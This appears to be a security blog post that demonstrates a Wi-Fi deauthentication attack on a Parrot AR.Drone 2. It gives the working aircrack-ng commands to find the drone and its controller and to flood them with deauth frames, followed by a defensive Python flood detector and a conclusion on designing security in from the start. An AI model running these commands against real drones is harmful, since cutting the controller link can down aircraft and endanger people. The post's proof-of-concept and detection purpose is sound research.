Hacking Commercial Drones
Unmanned Aerial Systems (UAS), popularly called drones, are a tech sensation nowadays, with recreational models available in department stores near you. Despite the advantages of using them (in a great range of services), this post aims to show how a lack of security consideration during design directly impacts safety.
This article was prompted by a video published by Johns Hopkins University:
From the video it is possible to recognize that they used drones from the manufacturer Parrot (model Bebop). Since we own a Parrot AR.Drone 2, we guess that the researchers found most of the issues to be due to the use of wireless (IEEE 802.11) for the remote controller.
Wireless networks are susceptible to many attacks, such as key cracking, man in the middle, network injection and many others.
In this post, the Proof of Concept is based on a “Deauthentication/Disassociation” attack, a known denial-of-service attack, which breaks the communication link between the mobile phone (controller) and the drone (access point). This task requires the aircrack-ng suite, more specifically the tools airodump-ng (captures 802.11 frames) and aireplay-ng (creates traffic).
Development
– Put wireless adapter on monitor mode
airmon-ng start wlan0
– Discover AR.Drone MAC address
airodump-ng wlan0mon   # In this case: 90:03:B7:38:F5:B8
– Discover the client connected to AR.drone BSSID
airodump-ng wlan0mon -c 1 --bssid 90:03:B7:38:F5:B8   # In this case: 44:80:EB:00:0B:41
– Use aireplay-ng to disassociate the client
aireplay-ng -0 1000 -a 90:03:B7:38:F5:B8 -c 44:80:EB:00:0B:41 wlan0mon
-0 selects the deauthentication attack, 1000 is the number of deauths to send, -a is the MAC address of the Parrot AR.Drone, -c is the MAC address of the client, and wlan0mon is the interface.
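From the defender's side, the burst of deauthentication frames this procedure produces is easy to spot on a monitor-mode capture. The following detector is an added example, not code from the original post: it parses raw 802.11 management headers and flags any BSSID that receives more than a threshold of deauth/disassoc frames within a sliding window. The window, threshold, function names and sample capture are constructed assumptions; the two MAC addresses are the ones shown above.

```python
import struct
from collections import defaultdict, deque

SUBTYPES = {10: "disassoc", 12: "deauth"}  # 802.11 management frame subtypes

def mac(raw):
    return ":".join(f"{b:02X}" for b in raw)

def parse_mgmt(frame):
    """Return (kind, dst, src, bssid, reason) for a deauth/disassoc frame, else None."""
    if len(frame) < 26:                      # 24-byte header + 2-byte reason code
        return None
    version, ftype, subtype = frame[0] & 3, (frame[0] >> 2) & 3, frame[0] >> 4
    if version != 0 or ftype != 0 or subtype not in SUBTYPES:
        return None                          # not a management deauth/disassoc frame
    (reason,) = struct.unpack_from("<H", frame, 24)
    return SUBTYPES[subtype], mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def detect_floods(frames, window=1.0, threshold=10):
    """frames: time-ordered (timestamp_s, raw 802.11 frame without radiotap header).
    Returns [(bssid, alert_time, frames_in_window)], one entry per flooded BSSID."""
    recent, alerts = defaultdict(deque), {}
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed is None:
            continue
        q = recent[parsed[3]]
        q.append(ts)
        while ts - q[0] > window:            # drop frames older than the window
            q.popleft()
        if len(q) > threshold and parsed[3] not in alerts:
            alerts[parsed[3]] = (ts, len(q))
    return [(b, t, n) for b, (t, n) in alerts.items()]

def build(subtype, dst, src, bssid, reason=7):
    """Construct a bare management frame in memory (sample data for the detector only)."""
    h = lambda m: bytes.fromhex(m.replace(":", ""))
    return bytes([subtype << 4, 0, 0, 0]) + h(dst) + h(src) + h(bssid) + struct.pack("<HH", 0, reason)

DRONE, PHONE = "90:03:B7:38:F5:B8", "44:80:EB:00:0B:41"   # MACs from the post

def constructed_capture():
    """Constructed sample: one ordinary disconnect, beacon-type frames, then a 40-frame burst."""
    cap = [(0.0, build(12, DRONE, PHONE, DRONE, reason=3))]
    cap += [(1.0 + i, build(8, "FF:FF:FF:FF:FF:FF", DRONE, DRONE)) for i in range(3)]
    cap += [(5.0 + i * 0.01, build(12, PHONE, DRONE, DRONE)) for i in range(40)]
    return cap

if __name__ == "__main__":
    for bssid, ts, n in detect_floods(constructed_capture()):
        print(f"ALERT {bssid}: {n} deauth/disassoc frames within 1 s at t={ts:.2f}")
```

The single disconnect at t=0 does not trigger an alert; only the burst crosses the threshold, which is the property that separates a flood from normal client roaming.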
Video
Result
Conclusion
This post points out the risk of adopting technologies without considering security and its impact on operation. Security requirements set early in the design could lead to a more secure product, which directly affects safety and business aspects.